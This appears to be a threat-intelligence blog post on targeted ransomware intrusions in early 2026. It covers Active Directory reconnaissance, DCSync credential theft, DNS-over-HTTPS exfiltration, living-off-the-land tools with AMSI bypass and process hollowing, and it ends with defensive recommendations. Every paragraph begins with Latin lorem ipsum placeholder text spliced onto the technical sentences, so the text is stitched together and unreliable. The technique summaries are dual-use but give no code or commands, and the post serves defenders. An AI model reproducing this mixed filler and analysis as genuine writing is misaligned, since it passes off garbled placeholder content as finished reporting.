Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium. Ransomware operators have shifted from opportunistic spray-and-pray tactics to highly targeted intrusions with median dwell times exceeding three weeks. This post examines MITRE ATT&CK technique clusters observed across 14 incidents in Q1 2026.
The Shift to Pre-Ransomware Reconnaissance
At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati. Affiliates now conduct extensive Active Directory enumeration using BloodHound and SharpHound before deploying encryptors, ensuring maximum blast radius. Domain admin credentials are routinely obtained via DCSync attacks (T1003.006) weeks before encryption begins.
Novel Exfiltration via DNS Tunnelling
Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est. A notable shift observed in 2026 is the use of DNS-over-HTTPS tunnelling for data exfiltration, routing traffic through legitimate resolvers to evade network-based DLP controls (T1048.003). Victim data is base64-encoded and embedded in DNS TXT record queries, making detection significantly harder without deep packet inspection.
Living-Off-the-Land Techniques
Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Operators increasingly rely on native Windows tools including certutil.exe, wmic.exe, and PowerShell with AMSI bypasses to reduce their malware footprint. EDR evasion is achieved through direct syscalls and process hollowing into signed Microsoft binaries (T1055.012).
Defensive Recommendations
Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Organisations should prioritise credential hygiene, enforce tiered administrative access, and deploy honeytokens across Active Directory to detect reconnaissance activity early. Network monitoring for anomalous DNS query volumes remains one of the highest-yield detections for this campaign cluster.